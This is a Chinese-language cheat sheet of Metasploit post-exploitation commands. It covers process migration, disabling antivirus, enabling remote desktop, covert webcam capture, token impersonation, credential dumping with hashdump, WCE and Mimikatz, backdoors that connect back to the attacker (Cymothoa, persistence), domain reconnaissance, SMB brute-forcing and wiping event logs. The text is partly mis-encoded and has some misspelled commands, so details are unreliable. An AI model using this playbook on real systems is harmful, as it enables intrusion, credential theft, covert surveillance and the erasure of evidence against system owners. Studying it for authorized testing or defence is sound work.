天天看點

msf 擷取session 之後

程序遷移:
    ps   擷取程序
    getpid  shell的程序号
    migrate  遷移
    run post/windows/manage/migrate     自動遷移


shell之後:
    sysinfo 擷取系統資訊
    run post/windows/gather/checkvm        檢視目标是否允許在虛拟機
    idletime        最近運作的時間
    route        檢視目錄完整網絡
    getuid        目前使用者名
    run post/windows/manage/killav        關閉防毒軟體
    run post/windows/manage/enable_rdp    開啟3389
    run post/windows/manage/autoroute    目标子網情況
    background    隐藏背景
    route add    添加路由
    route    print檢視
    run post/windows/gather/enum_logged_on_users    列舉目前有多少使用者登入過目标主機
    run post/windows/gather/enum_applocations        列舉安裝在目标主機上
    run post/windows/gather/credentials/windows_autologin    抓取自動登入的使用者名密碼
    load espia   screengrad    抓取此時螢幕截圖
    webcam_list    有無攝像頭
    webcam_snap    拍照
    webcam_stream    開啟直播模式
    shell 進入目标shell
檔案系統指令:
    pwd或getwd    目标主機目前處于哪個目錄
    getlwd    自己處于哪個目錄
    search -f *.txt -d c:\    搜尋c盤下所有txt檔案
    download    c:\test.txt /root 下載下傳到本機
    upload    /root/text.txt c:    上傳

權限提升:
    whoami/groups    檢視目前權限
    getuid    檢視目前權限
    getsystem    嘗試提權
    systeminfo    檢視更新檔
    使用wmic    列出安裝的更新檔
令牌竊取:
    use incognito
    list_token -u 列出token
    impersonate_token  +上述列出的有效令牌    假冒令牌攻擊(需要兩個\\)
    成功後運作shell

Hash攻擊:
    1.使用hashdump 抓取密碼
    非SYSTEM運作時會失敗
    run windows/gather/smart_hashdump    導出域所有使用者(windows7.開啟UAC會導緻失敗)
    2.Quarks    PwDump
    3.windows credentials Editor(WCE)
        上傳wce到目标。找到檔案 wce -w
    4.Mimikatz(管理者)
    load Mimikatz       加載    
    msv        抓取Hash
    kerberos    抓取系統票據
    wdigest        擷取系統賬戶資訊
    mimikatz_command -f samdump::hashed    抓取hash
    mimikatz_command -f handle::list  檢視程序
    mimikatz_command -f service::list  windows 服務
    mimikatz_command -f crypto::listProviders  檢視系統證書
    支援PowerShell調用(Invoke-Mimikatz)

後門:
    1.Cymothoa:
        cymothoa -p 982 -s 1 -y 4444    選擇PID為982的程序為宿主程序,使用第一類Shellcode,指定反彈端口4444
        nc -nvv 目标主機 4444    使用nc進行連接配接
    2.Persistence:
        run persistence -A -S -U -i 60 -p 4321 -r 目标主機
            A :自動啟動payload程式
            S :系統啟動時自動加載
            U :使用者登入時自動啟動
            X :開機時自動加載
            i :回連的時間間隔
            P :監聽反向連接配接端口号
            r :目标主機
Web 後門:
    msf中使用generate生成

内網滲透:
    資訊收集:
        net user /domain : 檢視域使用者
        net view /domain :    檢視有幾個域
        net    view /domain :xxx    檢視域内主機
        net group /domain  : 檢視域裡面的組
        net group "domain computers" /domain 檢視域内所有的主機名
        net group "domain admins " /domain 檢視域管理者
        net group "domain controllers" /domain 檢視域控制器
        net group "enterprise admins" /domain 檢視企業管理器
        nettime /domain 檢視時間伺服器

    PowerShell 尋找域管線上服務
    擷取域管理權
    登入域控制:使用msf中的PsExec 反彈Meterpreter

SMB爆破内網:
    先添加路由
    然後使用smb_login 或psexec_scanner
    route add 
    creds

清理日志:
    删除所有使用者
    clearev    删除日志      

安安靜靜變優秀。 --胖丫